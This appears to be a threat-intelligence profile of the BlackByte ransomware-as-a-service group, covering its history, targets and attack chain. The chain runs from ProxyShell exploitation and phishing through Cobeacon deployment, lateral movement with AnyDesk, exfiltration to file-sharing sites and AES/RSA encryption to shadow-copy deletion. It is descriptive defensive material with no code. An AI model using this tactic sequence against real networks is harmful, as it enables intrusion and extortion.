|
| |
| |
| Peru
Chile
Turkey
India
Netherlands
United States
United Kingdom
Philippines |
| |
| |
| |
Overview
BlackByte is a ransomware group that first emerged in July 2021 and quickly gained attention for its aggressive targeting of critical infrastructure sectors and its sophisticated tactics. Operating on a Ransomware-as-a-Service (RaaS) model, BlackByte enables affiliates to deploy its ransomware, further expanding its reach. While it shares many characteristics with other ransomware families, such as exploiting known vulnerabilities and leveraging phishing techniques for initial access, BlackByte stands out due to its evolving encryption strategies and use of custom-built tools. In particular, it made headlines in 2021 when it attacked a variety of industries, including government, financial, and food sectors, marking its presence on the global threat landscape.
One key aspect of BlackByte’s operations is its continuous adaptation to security measures. Initially, it used a symmetric key encryption model, which allowed for the development of a decrypter. However, after researchers released a tool to help victims,
BlackByte quickly upgraded its encryption methods, implementing a more complex multi-key strategy that made decryption more difficult. This response underscores the group’s focus on maintaining a foothold in the ransomware space and avoiding the setbacks faced by earlier ransomware variants. As a result, it has maintained a steady pace of activity, with a notable uptick in attacks against Latin American targets, particularly government entities, in 2022.
Common targets
- Information
- Individuals
- Peru
- Chile
- Turkey
- India
- Netherlands
- United States
- United Kingdom
- Philippines
Attack Vectors
Phishing
Credential-based Attacks
Software Vulnerabilities
How they operate
The first step in a BlackByte attack typically involves gaining initial access to the victim’s network. The group has been known to exploit vulnerabilities, such as the ProxyShell flaw in Microsoft Exchange servers, which allows attackers to execute remote code and establish a foothold in the system. Alternatively, BlackByte uses phishing emails containing malicious payloads to trick users into executing the malware. Once the group gains access to the target environment, it deploys a custom tool called “Cobeacon” using the Windows tool Certutil, which enables further escalation and lateral movement.
Once BlackByte has established control over the victim’s system, the next step is discovery and lateral movement. Using tools like NetScan, the attackers conduct reconnaissance to understand the network topology and identify valuable targets. They then deploy
AnyDesk, a legitimate remote access tool, to maintain control over the infected system and move laterally within the network. This technique allows BlackByte operators to deepen their access, reaching critical systems and increasing the likelihood of successful encryption. During this phase, BlackByte also terminates specific security processes to evade detection and hinder the effectiveness of endpoint protection.
Data exfiltration is a critical component of BlackByte’s operations, as the group seeks to steal sensitive information before deploying its ransomware. The malware uses WinRAR to archive important files and then uploads them to file-sharing sites such as anonymfiles[.]com or file[.]io. This step ensures that BlackByte operators have a copy of the stolen data, which can be used for double extortion — a tactic where the attacker threatens to leak the stolen data unless the ransom is paid. After the data has been exfiltrated, BlackByte proceeds to encrypt the victim’s files using a custom encryption mechanism.
The encryption process used by BlackByte is one of its defining features. Early versions of the ransomware employed symmetric AES encryption, which allowed researchers to develop a decryption tool. In response, BlackByte evolved its encryption strategy, implementing a more complex system that combines AES and RSA encryption. The ransomware generates an AES128 key, which is encrypted with an RSA key. This layered encryption ensures that files cannot be decrypted without access to the private RSA key, making recovery without paying the ransom nearly impossible. Additionally, BlackByte deletes system shadow copies using the “vssadmin” command, further complicating recovery efforts for victims.
Finally, BlackByte concludes the attack by leaving a ransom note demanding payment in cryptocurrency in exchange for the decryption key. The note also includes a warning not to use publicly available decryption tools, as they are ineffective against the newer versions of the ransomware. This commitment to innovation and its RaaS model has allowed BlackByte to maintain a significant presence in the ransomware landscape, with its operators continuously refining their tactics to stay ahead of security measures.
